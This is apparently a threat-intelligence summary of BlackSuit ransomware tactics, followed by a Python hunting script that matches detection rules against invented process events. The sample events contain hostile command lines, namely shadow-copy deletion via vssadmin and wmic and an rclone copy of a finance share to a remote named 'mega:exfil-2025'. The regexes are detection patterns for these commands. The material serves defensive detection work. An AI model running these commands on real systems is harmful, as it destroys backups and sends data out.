A Hybrid Approach with Data Exfiltration and Encryption

July 14, 2025, 11:09 a.m.

Description

The BlackSuit ransomware group, believed to be a rebrand of Royal ransomware, has emerged as a significant threat to organizations. The intrusion combines data exfiltration with encryption, using Cobalt Strike for command and control, rclone to copy data out to attacker-controlled remote storage, and the BlackSuit encryptor for file encryption. The group's tactics include lateral movement through RDP, SMB, and PsExec, credential dumping, and deletion of volume shadow copies to hinder recovery. Notably, the encryptor accepts a -nomutex flag, which skips the mutex check that would otherwise stop a second instance from starting, so multiple copies can run concurrently. The attack flow proceeds from initial access to lateral movement, data exfiltration, partial encryption of files, and a ransom demand of between $1 million and $10 million USD in Bitcoin. This hybrid approach, in which stolen data is leveraged alongside encryption, illustrates how ransomware operations continue to evolve and why organizations need both detection of the exfiltration stage and resilient backups that survive shadow-copy deletion.
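The tool chain described above (rclone pushing data to a remote, shadow-copy deletion, the -nomutex flag, PsExec for lateral movement) translates directly into hunting rules. The Python below is an added example and is not code from the original report: it runs constructed process-creation events, with invented host names, paths and command lines, through those rules and then ranks hosts by how many distinct stages fired, since a host showing exfiltration, shadow deletion and the encryptor together is the one to isolate first. Field names follow the Sysmon Event ID 1 convention (Image, CommandLine, ParentImage); the rule names are this example's own.

```python
"""Hunting rules for the tradecraft described above (shadow-copy deletion,
rclone exfiltration, the -nomutex execution flag, PsExec lateral movement),
run over CONSTRUCTED process-creation events.  Added example; the events,
hosts and paths are invented, not telemetry from any real incident."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str          # full path of the started process
    command_line: str
    parent_image: str   # full path of the parent process


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# vssadmin and wmic are the two shadow-copy deletion commands most often seen.
SHADOW_DELETE_RE = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)
# rclone copying/syncing to a remote: a "name:" argument whose colon is not
# followed by a path separator (so "C:\Users" does not match, "mega:dump" does).
# Many teams alert on any rclone execution at all; this is the tighter variant.
RCLONE_EXFIL_RE = re.compile(
    r"\brclone(\.exe)?\b.*\b(copy|copyto|sync|move)\b.*\s[A-Za-z0-9_-]+:(?![\\/])", re.I)
# The flag the description notes lets several encryptor instances run at once.
NOMUTEX_RE = re.compile(r"(^|\s)-nomutex(\s|$)", re.I)
# PSEXESVC.exe is the service PsExec drops on the target host.
PSEXEC_NAMES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}


def matching_rules(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    hits = []
    if SHADOW_DELETE_RE.search(ev.command_line):
        hits.append("shadow_copy_deletion")
    if RCLONE_EXFIL_RE.search(ev.command_line):
        hits.append("rclone_exfil")
    if NOMUTEX_RE.search(ev.command_line):
        hits.append("nomutex_execution")
    if _basename(ev.image) in PSEXEC_NAMES or _basename(ev.parent_image) in PSEXEC_NAMES:
        hits.append("psexec_lateral_movement")
    return hits


def hunt(events):
    """(rule, host, command_line) for every hit, in event order."""
    return [(r, ev.host, ev.command_line) for ev in events for r in matching_rules(ev)]


def hosts_by_stage_count(events):
    """Hosts ranked by how many DISTINCT stages fired on them (most first);
    hosts with no hits are omitted."""
    stages = {}
    for ev in events:
        for r in matching_rules(ev):
            stages.setdefault(ev.host, set()).add(r)
    return sorted(((h, len(s)) for h, s in stages.items()), key=lambda x: (-x[1], x[0]))


# Constructed sample telemetry (Sysmon Event ID 1 style fields; invented values).
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin.exe delete shadows /all /quiet", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("WS01", r"C:\ProgramData\rclone\rclone.exe",
              r'rclone.exe copy "C:\Shares\Finance" mega:exfil-2025 --transfers 8',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("WS01", r"C:\Users\Public\update.exe",
              "update.exe -nomutex", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("FS01", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c whoami", r"C:\Windows\PSEXESVC.exe"),
    ProcEvent("FS01", r"C:\Windows\System32\wbem\WMIC.exe",
              "wmic shadowcopy delete", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("WS02", r"C:\Program Files\7-Zip\7z.exe",
              r'7z.exe a backup.7z "C:\Projects"', r"C:\Windows\explorer.exe"),
    ProcEvent("WS02", r"C:\Tools\rclone.exe",
              "rclone.exe ls backup:", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for rule, host, cmd in hunt(SAMPLE_EVENTS):
        print(f"{host:5} {rule:25} {cmd}")
    print(hosts_by_stage_count(SAMPLE_EVENTS))
```

On the constructed sample, WS01 trips three distinct stages (shadow deletion, rclone exfiltration, the -nomutex execution) and FS01 two (a PsExec-spawned shell and wmic shadow deletion), while the archiver and the read-only rclone listing on WS02 produce no hits. In production these rules belong in the SIEM as separate detections; the per-host stage count is the triage layer on top of them.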

Date

  • Created: July 12, 2025, 9:21 a.m.
  • Published: July 12, 2025, 9:21 a.m.
  • Modified: July 14, 2025, 11:09 a.m.

Attack Patterns

  • BlackSuit
  • Cobalt Strike - S0154